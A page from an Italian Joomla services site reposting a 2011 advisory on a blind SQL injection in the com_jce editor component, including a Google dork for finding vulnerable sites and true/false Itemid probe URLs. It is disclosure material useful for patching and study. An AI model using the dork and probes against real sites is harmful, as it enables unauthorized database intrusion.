• Home
  • Siti web
    • Prezzo siti web joomla
    • Sito base
    • Sito medio
    • Ecommerce
      • Gestionale per vMart
      • Design Ecommerce solution
    • Settori
      • Agenzie immobiliari
      • Autonoleggio
      • Sito d'aste
  • Servizi
    • Joomla Cloud
    • Virtue Mart
    • Consulenza
    • Sicurezza CMS
      • Vulnerabilità
    • Conversione
    • Hosting Joomla
    • Formazione
    • Assistenza Joomla
    • Aggiornamento Joomla
  • Estensioni
  • Referenze
  • Faq
  • News
  • Template
  • Contact
Sei qui: Servizi Sicurezza CMS Vulnerabilità

joomlacontenteditor (com_jce) BLIND sql injection vulnerability

Creato Venerdì, 15 Aprile 2011 00:08

===================================================================

joomlacontenteditor (com_jce) BLIND sql injection vulnerability
===================================================================
Software:   joomlacontenteditor (com_jce)
Vendor:     www.joomlacontenteditor.net
Vuln Type:  BLind SQL Injection
Download link:  http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here)
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
Dork:       inurl:"/index.php?option=com_jce"
References: http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-comjce-blind-sql.html
===================================================================
Description:
JCE makes creating and editing Joomla!®
content easy Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want,
without limitations, and without needing to know or learn HTML, XHTML, CSS...
===================================================================
exploit & p0c
[!] index.php?option=com_jce&Itemid=[valid Itemid]
Example p0c
[!] http://host/index.php?option=com_jce&Itemid=8 <= True
[!] http://host/index.php?option=com_jce&Itemid=-8 <= False
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
Categoria: Vulnerabilità Joomla
Joomla SEF URLs by Artio
Joomla Service - PI 12456548985 Scroll to Top